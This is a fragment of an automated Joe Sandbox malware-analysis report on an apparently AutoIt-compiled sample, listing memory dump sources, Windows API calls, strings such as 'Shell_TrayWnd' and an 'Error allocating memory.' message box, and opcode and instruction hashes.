                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 529655941-2988720461
                                                                                          • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                          • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                          • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                          • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                          APIs
                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                            • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message_doexit
                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                          • API String ID: 1993061046-4017498283
                                                                                          • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                          • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                          • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                          • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E